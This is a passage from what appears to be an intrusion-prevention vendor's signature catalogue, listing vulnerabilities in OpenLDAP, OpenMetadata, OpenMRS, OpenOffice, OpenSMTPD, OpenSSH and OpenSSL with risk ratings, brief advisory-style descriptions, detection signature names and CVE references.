https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36222
Back to top

OpenLDAP-Slapd-Search-Parsing-Checktime-Assertion-Failure

About this vulnerability: A vulnerability in OpenLDAP Foundation OpenLDAP
Risk: High
First detected in: sgpkg-ips-1350-5242
Last changed: sgpkg-ips-1350-5242
Platform: Generic
Software: OpenLDAP
Type: Input Validation
Description: A denial-of-service vulnerability has been reported in the slapd of OpenLDAP. The vulnerability is due to improper input validation in controls in LDAP search requests. A remote attacker can exploit the vulnerability by sending a crafted query to the target OpenLDAP server. Successful exploitation could cause an assertion failure which leads to a denial of service condition.
Situation: LDAP_CS-OpenLDAP-Slapd-Search-Parsing-Checktime-Assertion-Failure
References:
CVE-2021-27212
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27212
Back to top

OpenLDAP-Slapd-Search-Parsing-Issuerandthisupdatecheck-Integer-Underflow

About this vulnerability: A vulnerability in OpenLDAP Foundation OpenLDAP
Risk: High
First detected in: sgpkg-ips-1326-5242
Last changed: sgpkg-ips-1326-5242
Platform: Generic
Software: OpenLDAP
Type: Integer Overflow
Description: A denial-of-service vulnerabilities has been reported in slapd; a component of OpenLDAP. The vulnerability is due to improper input validation on controls in LDAP search requests. A remote attacker can exploit these vulnerabilities by sending a crafted query to the target OpenLDAP server. Successful exploitation could cause an integer underflow leading to denial of service conditions.
Situation: LDAP_CS-OpenLDAP-Slapd-Search-Parsing-Issuerandthisupdatecheck-Integer-Underflow
References:
CVE-2020-36228
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36228
Back to top

OpenLDAP-Slapd-serialNumberAndIssuerCheck-Integer-Underflow

About this vulnerability: A vulnerability in OpenLDAP slapd
Risk: High
First detected in: sgpkg-ips-1363-5242
Last changed: sgpkg-ips-1865-5242
Platform: Generic
Software: OpenLDAP
Type: Input Validation
Description: A vulnerability in the slapd of OpenLDAP, versions prior to 2.4.57, which allows remote attackers to cause a denial of service condition by sending a crafted query to the target OpenLDAP server, due to the improper validation in controls in LDAP search requests.
Situation: LDAP_CS-OpenLDAP-Slapd-serialNumberAndIssuerCheck-Integer-Underflow
References:
CVE-2020-36221
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-36221
Back to top

OpenMediaVault-Cron-Remote-Command-Execution

About this vulnerability: OpenMediaVault Cron Remote Command Execution
Risk: Moderate
First detected in: sgpkg-ips-571-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenMediaVault
Type: Code Injection
Description: There is a remote command execution vulnerability in OpenMediaVault software NAS solution. An authenticated user can create Cron-jobs for any system user, including root.
Situation: HTTP_CRL-OpenMediaVault-Cron-Remote-Command-Execution
References:
CVE-2013-3632
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3632
BID-62873
http://www.securityfocus.com/bid/62873
OSVDB-99143
http://www.osvdb.org/99143
Back to top

Openmetadata-Authentication-Bypass-CVE-2024-28255

About this vulnerability: A vulnerability in OpenMetadata
Risk: High
First detected in: sgpkg-ips-1718-5242
Last changed: sgpkg-ips-1718-5242
Platform: Generic
Software: OpenMetadata
Type: Malfunction
Description: An authentication bypass vulnerability has been reported in OpenMetadata versions prior to 1.2.4. If chained with another vulnerability, such as CVE-2024-28847 SpEL injection, this issue can be leveraged for unauthenticated remote code execution.
Situation: HTTP_CRL-Openmetadata-Authentication-Bypass-CVE-2024-28255
HTTP_CRL-Openmetadata-Remote-Code-Execution-Chain-CVE-2024-28255
References:
CVE-2024-28255
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-28255
Back to top

Openmetadata-Spel-Injection-CVE-2024-28253

About this vulnerability: A vulnerability in OpenMetadata
Risk: High
First detected in: sgpkg-ips-1718-5242
Last changed: sgpkg-ips-1720-5242
Platform: Generic
Software: OpenMetadata
Type: Input Validation
Description: A SpEL injection vulnerability has been reported in OpenMetadata versions prior to 1.2.4. If chained with CVE-2024-28255 for authentication bypass, this issue can be leveraged for unauthenticated remote code execution.
Situation: HTTP_CS-Openmetadata-Spel-Injection-CVE-2024-28253
HTTP_CRL-Openmetadata-Spel-Injection-CVE-2024-28847
HTTP_CRL-Openmetadata-Remote-Code-Execution-Chain-CVE-2024-28255
References:
CVE-2024-28253
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-28253
Back to top

Openmetadata-Spel-Injection-CVE-2024-28254

About this vulnerability: A vulnerability in OpenMetadata
Risk: High
First detected in: sgpkg-ips-1718-5242
Last changed: sgpkg-ips-1728-5242
Platform: Generic
Software: OpenMetadata
Type: Input Validation
Description: A SpEL injection vulnerability has been reported in OpenMetadata versions prior to 1.2.4. If chained with CVE-2024-28255 for authentication bypass, this issue can be leveraged for unauthenticated remote code execution.
Situation: HTTP_CSU-Openmetadata-Spel-Injection-CVE-2024-28254
HTTP_CRL-Openmetadata-Spel-Injection-CVE-2024-28847
HTTP_CRL-Openmetadata-Remote-Code-Execution-Chain-CVE-2024-28255
References:
CVE-2024-28254
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-28254
Back to top

Openmetadata-Spel-Injection-CVE-2024-28847

About this vulnerability: A vulnerability in OpenMetadata
Risk: High
First detected in: sgpkg-ips-1718-5242
Last changed: sgpkg-ips-1718-5242
Platform: Generic
Software: OpenMetadata
Type: Input Validation
Description: A SpEL injection vulnerability has been reported in OpenMetadata versions prior to 1.2.4. If chained with CVE-2024-28255 for authentication bypass, this issue can be leveraged for unauthenticated remote code execution.
Situation: HTTP_CRL-Openmetadata-Spel-Injection-CVE-2024-28847
HTTP_CRL-Openmetadata-Remote-Code-Execution-Chain-CVE-2024-28255
References:
CVE-2024-28847
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-28847
Back to top

Openmetadata-Spel-Injection-CVE-2024-28848

About this vulnerability: A vulnerability in OpenMetadata
Risk: High
First detected in: sgpkg-ips-1718-5242
Last changed: sgpkg-ips-1718-5242
Platform: Generic
Software: OpenMetadata
Type: Input Validation
Description: A SpEL injection vulnerability has been reported in OpenMetadata versions prior to 1.2.4. If chained with CVE-2024-28255 for authentication bypass, this issue can be leveraged for unauthenticated remote code execution.
Situation: HTTP_CRL-Openmetadata-Spel-Injection-CVE-2024-28847
HTTP_CRL-Openmetadata-Remote-Code-Execution-Chain-CVE-2024-28255
References:
CVE-2024-28848
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-28848
Back to top

Openmrs-Reference-Application-Sessionlocation-Reflected-Cross-Site-Scripting

About this vulnerability: A vulnerability in OpenMRS Reference Application
Risk: Moderate
First detected in: sgpkg-ips-1254-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenMRS
Type: Input Validation
Description: There exists a cross-site scripting vulnerability in OpenMRS Reference Application. Successful exploitation could lead in abitrary script exeuction in the target user's web browser.
Situation: HTTP_CRL-Openmrs-Reference-Application-Sessionlocation-Reflected-Cross-Site-Scripting
References:
CVE-2020-5730
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-5730
Back to top

Openmrs-Webservices.rest-Insecure-Object-Deserialization

About this vulnerability: A vulnerability in OpenMRS
Risk: Moderate
First detected in: sgpkg-ips-1144-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenMRS
Type: Input Validation
Description: Lack of input validation within the webservices.rest module in OpenMRS causes a deserialization vulnerability, which can lead to an attacker gaining the ability to execute arbitrary code on the target with the privileges of the service.
Situation: HTTP_CS-Openmrs-Webservices.rest-Insecure-Object-Deserialization
References:
CVE-2018-19276
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19276
Back to top

OpenNetAdmin-Ping-Command-Injection

About this vulnerability: A vulnerability in OpenNetAdmin
Risk: High
First detected in: sgpkg-ips-1226-5242
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: OpenNetAdmin
Type: Input Validation
Description: There exists a vulnerability in OpenNetAdmin, versions 8.5.14 to 18.1.1, which allows remote attackers to execute arbitrary code due to insufficient input validation of /ona/login.php.
Situation: HTTP_CRL-OpenNetAdmin-Ping-Command-Injection
Back to top

OpenNMS-Privilege-Escalation-CVE-2023-0872

About this vulnerability: A vulnerability in OpenNMS
Risk: High
First detected in: sgpkg-ips-1822-5242
Last changed: sgpkg-ips-1822-5242
Platform: Unix; Linux
Software: OpenNMS
Type: Input Validation
Description: The Horizon REST API includes a users endpoint in OpenMNS Horizon 31.0.8 and versions earlier than 32.0.2 on multiple platforms is vulnerable to elevation of privilege. The solution is to upgrade to Meridian 2023.1.6, 2022.1.19, 2021.1.30, 2020.1.38 or Horizon 32.0.2 or newer.
Situation: File-Text_OpenNMS-Authenticated-Remote-Code-Execution
File-TextId_OpenNMS-Authenticated-Remote-Code-Execution
References:
CVE-2023-0872
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0872
Back to top

OpenNMS-Privilege-Escalation-CVE-2023-40315

About this vulnerability: A vulnerability in OpenNMS
Risk: High
First detected in: sgpkg-ips-1822-5242
Last changed: sgpkg-ips-1822-5242
Platform: Unix; Linux
Software: OpenNMS
Type: Input Validation
Description: In OpenMNS 31.0.8 and versions earlier than 32.0.2 and related Meridian versions, any user that has the ROLE_FILESYSTEM_EDITOR can easily escalate their privileges to ROLE_ADMIN or any other role. The solution is to upgrade to Meridian 2023.1.5 or Horizon 32.0.2 or newer.
Situation: File-Text_OpenNMS-Authenticated-Remote-Code-Execution
File-TextId_OpenNMS-Authenticated-Remote-Code-Execution
References:
CVE-2023-40315
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-40315
Back to top

OpenNMS-Rmi-Java-Object-Deserialization

About this vulnerability: A vulnerability in OpenNMS
Risk: Moderate
First detected in: sgpkg-ips-829-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenNMS
Type: Input Validation
Description: A vulnerability in OpenNMS
Situation: Generic_CS-OpenNMS-Rmi-Java-Object-Deserialization
Back to top

OpenNMS-XML-External-Entity-Injection

About this vulnerability: OpenNMS XML External Entity Injection vulnerability.
Risk: High
First detected in: sgpkg-ips-687-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenNMS
Type: Code Injection
Description: An XML external entity injection vulnerability exists in OpenNMS, due to the lack of command validation, which allows remote attackers to gain root access through the user rtc, giving the attackers unrestricted access.
Situation: HTTP_CRL-OpenNMS-XML-External-Entity-Injection
References:
CVE-2015-0975
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0975
Back to top

OpenOffice-EMF-File-EMR-Record-Parsing-Integer-Overflow

About this vulnerability: A vulnerability in OpenOffice.org
Risk: High
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenOffice.org
Type: Integer Overflow
Description: An integer overflow vulnerability exists in the OpenOffice software suite.
Situation: HTTP_SS-OpenOffice-EMF-File-EMR-Record-Parsing-Integer-Overflow
File-Binary_OpenOffice-EMF-File-EMR-Record-Parsing-Integer-Overflow
References:
CVE-2008-2238
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2238
BID-31962
http://www.securityfocus.com/bid/31962
Back to top

OpenOffice-EMF-File-EMR_BITBLT-Record-Integer-Overflow

About this vulnerability: Integer overflow vulnerability in OpenOffice software suite
Risk: Moderate
First detected in: sgpkg-ips-155-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenOffice.org
Type: Buffer Overflow
Description: There is an integer overflow vulnerability in OpenOffice software suite. A remote attacker can exploit this vulnerability by persuading a user to open a malicious EMF file with a vulnerable version of the affected product. Successful exploitation allows code execution with the privileges of the currently logged in user.
Situation: E-Mail_BS-OpenOffice-EMF-File-EMR-BITBLT-Record-Integer-Overflow
HTTP_SS-OpenOffice-EMF-File-EMR-BITBLT-Record-Integer-Overflow
File-Binary_OpenOffice-EMF-File-EMR-BITBLT-Record-Integer-Overflow
References:
CVE-2007-5746
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5746
BID-28819
http://www.securityfocus.com/bid/28819
OSVDB-44470
http://www.osvdb.org/44470
Back to top

OpenOffice-OLE-File-Stream-Buffer-Overflow

About this vulnerability: A vulnerability in OpenOffice
Risk: High
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenOffice.org
Type: Integer Overflow
Description: A heap overflow vulnerability exists in the OpenOffice software suite. The vulnerability is due to the way OpenOffice imports OLE files. A remote attacker could exploit this vulnerability by persuading a user to open an OLE file, potentially causing arbitrary code to be injected and executed in the security context of the logged in user.
Situation: File-OLE_OpenOffice-OLE-File-Stream-Buffer-Overflow
References:
CVE-2008-0320
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0320
BID-28819
http://www.securityfocus.com/bid/28819
Back to top

OpenOffice-TIFF-File-Parsing-Integer-Overflow

About this vulnerability: A vulnerability in OpenOffice
Risk: Moderate
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-1412-5242
Platform: Generic
Software: OpenOffice.org
Type: Integer Overflow
Description: An integer overflow vulnerability exists in the OpenOffice software suite.
Situation: HTTP_SS-OpenOffice-TIFF-File-Parsing-Integer-Overflow
References:
CVE-2007-2834
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2834
BID-25690
http://www.securityfocus.com/bid/25690
Back to top

OpenOffice.org-Microsoft-Word-File-Processing-Integer-Underflow

About this vulnerability: A vulnerability in OpenOffice.org OpenOffice
Risk: Moderate
First detected in: sgpkg-ips-413-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenOffice.org
Type: Integer Overflow
Description: An integer underflow vulnerability has been reported in OpenOffice. The vulnerability is due to an error processes sprmTDefTable records in Microsoft Word files. A remote unauthenticated attacker could leverage this vulnerability by enticing a target user to open a malicious Microsoft Word file with a vulnerable version of the application. In a successful attack, it may result in a heap overflow leading to the possibility of code execution within the security context of the currently logged on user. In an unsuccessful attack, the target application could terminate abnormally.
Situation: File-OLE_OpenOffice-MS-Word-File-Processing-Integer-Underflow
References:
CVE-2009-3301
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3301
BID-38218
http://www.securityfocus.com/bid/38218
Back to top

OpenOffice.org-RTF-File-Parsing-Heap-Buffer-Overflow

About this vulnerability: A heap buffer overflow vulnerability in OpenOffice.org
Risk: High
First detected in: sgpkg-ips-113-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenOffice.org
Type: Buffer Overflow
Description: There is a heap buffer overflow vulnerability in the OpenOffice.org software suite. The vulnerability is due to the way OpenOffice.org parses specially crafted Rich Text Format (RTF) documents. A remote attacker could exploit this vulnerability by persuading a user to open a specially crafted RTF file, potentially causing arbitrary code to be injected and executed in the security context of the logged in user.
Situation: HTTP_OpenOffice.org-RTF-File-Parsing-Heap-Buffer-Overflow
File-RTF_OpenOffice.org-RTF-File-Parsing-Heap-Buffer-Overflow
References:
CVE-2007-0245
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0245
BID-24450
http://www.securityfocus.com/bid/24450
OSVDB-35378
http://www.osvdb.org/35378
Back to top

OpenOffice.org-XPM-File-Processing-Integer-Overflow

About this vulnerability: A vulnerability in OpenOffice.org OpenOffice
Risk: Moderate
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenOffice.org
Type: Integer Overflow
Description: An integer overflow vulnerability has been reported in OpenOffice. The vulnerability is due to a boundary error when the XPMReader::ReadXPM function in xpmread.cxx in OpenOffice.org processes XPM files. A remote unauthenticated attacker could leverage this vulnerability by enticing a target user to open a malicious XPM file with a vulnerable application. In a successful attack, it may result in a heap overflow leading to the possibility of code execution within the security context of the currently logged on user. In an unsuccessful attack, the target application could terminate abnormally.
Situation: File-TextId_OpenOffice.org-XPM-File-Processing-Integer-Overflow
References:
CVE-2009-2949
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2949
BID-38218
http://www.securityfocus.com/bid/38218
Back to top

OpenProject-Cross-Site-Scripting-CVE-2019-17092

About this vulnerability: A vulnerability in OpenProject
Risk: High
First detected in: sgpkg-ips-1375-5242
Last changed: sgpkg-ips-1375-5242
Platform: Generic
Software: OpenProject
Type: Cross-site Scripting
Description: There exists a cross-site scripting vulnerability in OpenProject versions before 9.0.4 and 10.0.2. A successful exploitation can allow remote attackers to execute arbitrary HTML and script code via the sortBy parameter.
Situation: HTTP_CRL-OpenProject-Cross-Site-Scripting-CVE-2019-17092
References:
CVE-2019-17092
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17092
Back to top

OpenSIS-Modname-Code-Execution

About this vulnerability: An OpenSIS Modname Code Execution vulnerability
Risk: High
First detected in: sgpkg-ips-781-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenSIS
Type: Code Injection
Description: A vulnerability in OpenSIS, vesions 4.5 to 5.2, which allows remote attackers to inject and execute arbitrary code through the modname parameter in ajax.php.
Situation: HTTP_CRL-OpenSIS-Modname-Code-Execution
References:
CVE-2013-1349
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1349
OSVDB-100676
http://www.osvdb.org/100676
Back to top

OpenSIS-Unauthenticated-PHP-Code-Execution

About this vulnerability: A vulnerability in openSIS
Risk: High
First detected in: sgpkg-ips-1346-5242
Last changed: sgpkg-ips-1346-5242
Platform: Generic
Software: OpenSIS
Type: Input Validation
Description: There exists a vulnerability in OpenSIS, versions 7.4 and before, which allows remote attackers to execute arbitrary PHP code throught the scheduling/MassSchedule.php module due to the insufficient user input validation.
Situation: HTTP_CRL-OpenSIS-Unauthenticated-PHP-Code-Execution
References:
CVE-2020-13381
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13381
Back to top

OpenSLP-Project-And-VMware-OpenSLP-Heap-Buffer-Overflow

About this vulnerability: A vulnerability in OpenSLP
Risk: Moderate
First detected in: sgpkg-ips-1211-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenSLP; EMC VMware ESXi Server; VMWare Horizon
Type: Buffer Overflow
Description: There exists a pre-auth heap buffer overflow vulnerability in OpenSLP and VMware ESXi and Horizon DaaS. Successful exploitation could lead in arbitrary code execution.
Situation: Generic_UDP-OpenSLP-Project-And-VMware-OpenSLP-Heap-Buffer-Overflow
References:
CVE-2019-5544
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5544
Back to top

OpenSMTPD-Mta_io-Out-Of-Bounds-Read-Command-Execution

About this vulnerability: A vulnerability in OpenSMTPD
Risk: Moderate
First detected in: sgpkg-ips-1240-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenSMTPD
Type: Input Validation
Description: Improper handling of multiline replies in mta_io() causes an out of bounds read vulnerability in OpenSMPTD. A successful attack allows an attacker to execute arbitrary code on the target with the privileges of the target process.
Situation: SMTP_SS-OpenSMTPD-Mta_io-Out-Of-Bounds-Read-Command-Execution
References:
CVE-2020-8794
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8794
Back to top

OpenSMTPD_Command-Injection_CVE-2020-7247

About this vulnerability: A vulnerability in OpenSMTPD
Risk: Moderate
First detected in: sgpkg-ips-1220-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenSMTPD
Type: Input Validation
Description: There has been reported a command injection vulnerability in OpenSMTPD. This vulnerability could be exploited by a remote attacker. Successful exploitation can lead in arbitrary code execution.
Situation: SMTP_CS-OpenSMTPD-Command-Injection-CVE-2020-7247
References:
CVE-2020-7247
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7247
Back to top

OpenSSH-Backdoor-C2-Traffic

About this vulnerability: OpenSSH backdoor traffic was detected
Risk: High
First detected in: sgpkg-ips-1125-5242
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: <os>
Type: Backdoor
Description: Command & control traffic originating from a backdoor of OpenSSH was detected.
Situation: HTTP_CRL-OpenSSH-Backdoor-C2-Traffic
Back to top

OpenSSH-Challenge-Response-Integer-Overflow

About this vulnerability: Challenge Response OpenSSH Integer Overflow
Risk: High
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenSSH
Type: Integer Overflow
Description: Unpathced OpenSSH daemon versions up to 3.3p1 have a remotely exploitable interger overflow vulnerability. If successfully exploited, this vulnerability provides the attacker a remote root access. There are working exploit tools for this vulnerabilitiy in the wild.
Situation: SSH_Integer-Overflow-Attack-Detect-Gobbles
SSH_Integer-Overflow-Attack-Detect
SSH_Integer-Overflow-Attack-Detect-Gobbles-Reply
SSH_Bad-Version-Comment-Gobbles
References:
CVE-2002-0639
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0639
BID-5093
http://www.securityfocus.com/bid/5093
OSVDB-6245
http://www.osvdb.org/6245
Back to top

OpenSSH-Kex_Input_Kexinit-Denial-Of-Service

About this vulnerability: A vulnerability in OpenSSH
Risk: Moderate
First detected in: sgpkg-ips-840-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenSSH
Type: Resource Starvation
Description: Improper handling of client-sent key exchange initialization messages can be used to cause a denial of service condition on an OpenSSH server.
Situation: SSH_OpenSSH-Kex_Input_Kexinit-Denial-Of-Service
References:
CVE-2016-8858
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8858
BID-93776
http://www.securityfocus.com/bid/93776
Back to top

OpenSSH-Man-In-The-Middle-Via-VerifyHostKeyDNS-CVE-2025-26465

About this vulnerability: An attempt to exploit a vulnerability in OpenSSH server detected
Risk: High
First detected in: sgpkg-ips-1839-5242
Last changed: sgpkg-ips-1839-5242
Platform: Generic
Software: OpenSSH
Type: Input Validation
Description: A vulnerability was found in OpenSSH when the "VerifyHostKeyDNS" option is enabled. A man-in-the-middle (MitM) attack can be performed by a malicious machine impersonating a legit server. This issue occurs due to how OpenSSH mishandles error codes in specific conditions when verifying the host key. For an attack to be considered successful, the attacker needs to manage to exhaust the client's memory resource first, turning the attack complexity high.
Situation: SSH_Suspiciously-Large-SSH-Server-Certificate-CVE-2025-26465
References:
CVE-2025-26465
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-26465
Back to top

OpenSSH-Pre-Authentication-Denial-Of-Service-CVE-2025-26466

About this vulnerability: An attempt to exploit a vulnerability in OpenSSH detected
Risk: High
First detected in: sgpkg-ips-1839-5242
Last changed: sgpkg-ips-1839-5242
Platform: Generic
Software: OpenSSH
Type: Resource Starvation
Description: The OpenSSH client and server are vulnerable to a pre-authentication denial-of-service (DoS) attack: an asymmetric resource consumption of both memory and CPU. This vulnerability was introduced in August 2023 (shortly before OpenSSH 9.5p1) by commit dce6d80 ("Introduce a transport-level ping facility"). It could be exploited by attackers using SSH2_MSG_PING packets.
Situation: SSH_OpenSSH-Client-Pre-Authentication-Denial-Of-Service-CVE-2025-26466
SSH_OpenSSH-Server-Pre-Authentication-DoS-CVE-2025-26466
References:
CVE-2025-26466
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-26466
Back to top

OpenSSH-Sftp-Server.c-Denial-Of-Service

About this vulnerability: A vulnerability in OpenSSH
Risk: Moderate
First detected in: sgpkg-ips-1077-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenSSH
Type: Resource Starvation
Description: There exists a denial of service vulnerability in OpenSSH.
Situation: SSH_CS-OpenSSH-Sftp-Server.c-Denial-Of-Service
References:
CVE-2017-15906
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-15906
BID-101552
http://www.securityfocus.com/bid/101552
Back to top

OpenSSH-Sshd-SSH_old_dhgex-Handling-Double-Free-Vulnerability

About this vulnerability: A vulnerability in OpenSSH
Risk: High
First detected in: sgpkg-ips-1566-5242
Last changed: sgpkg-ips-1566-5242
Platform: Generic
Software: OpenSSH
Type: Malfunction
Description: A double free vulnerability has been reported in OpenSSH. The vulnerability is due to an error in the compat_kex_proposal() function of compat.c. An unauthenticated, remote attacker can exploit this by sending crafted packets to the target server. Successful exploitation could result in denial of service or potentially arbitrary code execution.
Situation: SSH_OpenSSH-Sshd-SSH_old_dhgex-Handling-Double-Free-Vulnerability
References:
CVE-2023-25136
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-25136
Back to top

OpenSSH-Sshd-Username-Information-Disclosure

About this vulnerability: A vulnerability in OpenSSH
Risk: Moderate
First detected in: sgpkg-ips-1213-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenSSH
Type: Malfunction
Description: There has been reported an information disclosure vulnerability in OpenSSH. Successful exploitation could lead in information disclosure.
Situation: SSH_CS-OpenSSH-Sshd-Username-Information-Disclosure
References:
CVE-2018-15473
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15473
Back to top

OpenSSL-Alternative-Chains-Certificate-Forgery-Policy-Bypass

About this vulnerability: A vulnerability in OpenSSL Project OpenSSL
Risk: High
First detected in: sgpkg-ips-662-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenSSL
Type: Malfunction
Description: A policy bypass vulnerability has been reported in OpenSSL. This is due to incorrectly implemented certificate chain verification, where forged certificates signed by certain non-CA leaf certificates are treated as valid by vulnerable versions of OpenSSL. An attacker could use a crafted certificate chain to bypass TLS certificate validation checks in OpenSSL client or server applications. Successful exploitation could allow a remote attacker to bypass authentication by impersonating users or services.
Situation: HTTPS_CS-OpenSSL-Alternative-Chains-Certificate-Forgery-Policy-Bypass
HTTPS_SS-OpenSSL-Alternative-Chains-Certificate-Forgery-Policy-Bypass
References:
CVE-2015-1793
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1793
BID-75652
http://www.securityfocus.com/bid/75652
Back to top

OpenSSL-Anonymous-ECDH-Denial-Of-Service

About this vulnerability: A vulnerability in OpenSSL Project OpenSSL
Risk: High
First detected in: sgpkg-ips-598-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenSSL
Type: Malfunction
Description: A denial of service vulnerability exists in OpenSSL. The vulnerability is due to a NULL pointer dereference in processing handshake messages using anonymous ECDH ciphersuites. A remote, unauthenticated attacker could exploit this vulnerability by sending specially crafted messages to a target. Successful exploitation could lead to a denial of service condition.
Situation: HTTPS_SS-OpenSSL-Anonymous-ECDH-Denial-Of-Service
References:
CVE-2014-3470
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3470
BID-67898
http://www.securityfocus.com/bid/67898
OSVDB-107731
http://www.osvdb.org/107731
Back to top

OpenSSL-ASN.1-Client-Certificate-Double-Free-Code-Execution

About this vulnerability: Double-free memory allocation error in OpenSSL ASN.1 parsing
Risk: Low
First detected in: sgpkg-ips-102-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenSSL
Type: Malfunction
Description: A double-free memory allocation error allows remote attackers to cause a Denial of Service (DoS) and may allow the execution of arbitrary code via an SSL client certificate with crafted invalid ASN.1 encoding.
Situation: HTTPS_CS-OpenSSL-ASN.1-Client-Certificate-Double-Free-Code-Execution
References:
CVE-2003-0545
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0545
BID-8732
http://www.securityfocus.com/bid/8732
OSVDB-3684
http://www.osvdb.org/3684
Back to top

OpenSSL-ASN.1-Client-Sertificate-BOF

About this vulnerability: Buffer overflow in OpenSSL ASN.1 parsing
Risk: Low
First detected in: sgpkg-ips-115-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenSSL
Type: Buffer Overflow
Description: A remote overflow exists in OpenSSL. OpenSSL fails to correctly parse ASN.1 tags in OpenSSL client certificates, resulting in a buffer overflow. With a specially crafted request, an attacker can cause Denial of Service (DoS) in OpenSSL or in an application using it.
Situation: HTTPS_CS-SSL-ASN.1-Bruteforcer-Tool-Usage
References:
CVE-2003-0544
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0544
BID-8732
http://www.securityfocus.com/bid/8732
OSVDB-3686
http://www.osvdb.org/3686
Back to top

OpenSSL-ASN.1-Integer-Overflow-DoS

About this vulnerability: Integer overflow in OpenSSL ASN.1 parsing
Risk: Low
First detected in: sgpkg-ips-115-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenSSL
Type: Malfunction
Description: A remote overflow exists in OpenSSL. OpenSSL fails to correctly handle error conditions in ASN.1 tags in SSL client certificates, resulting in an integer overflow. With a specially crafted request an attacker can cause Denial of Service (DoS) in OpenSSL or in an application using it.
Situation: HTTPS_CS-SSL-ASN.1-Bruteforcer-Tool-Usage
References:
CVE-2003-0543
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0543
BID-8732
http://www.securityfocus.com/bid/8732
OSVDB-3949
http://www.osvdb.org/3949
Back to top

OpenSSL-ASN1-Type_cmp-Denial-Of-Service

About this vulnerability: A vulnerability in OpenSSL Project OpenSSL
Risk: High
First detected in: sgpkg-ips-639-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenSSL
Type: Malfunction
Description: A denial of service vulnerability exists in OpenSSL. The vulnerability is due to a null pointer dereference error when an OpenSSL application receives and processes a crafted certificate. A remote, unauthenticated attacker can exploit this vulnerability by sending a crafted client certificate to a vulnerable server application that requests it. Successful exploitation will cause the server application to crash, resulting in a denial-of-service condition.
Situation: HTTPS_SS-OpenSSL-ASN1_Type_cmp-Denial-Of-Service
References:
CVE-2015-0286
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0286
BID-73225
http://www.securityfocus.com/bid/73225
Back to top

OpenSSL-BN_Mod_sqrt-Infinite-Loop

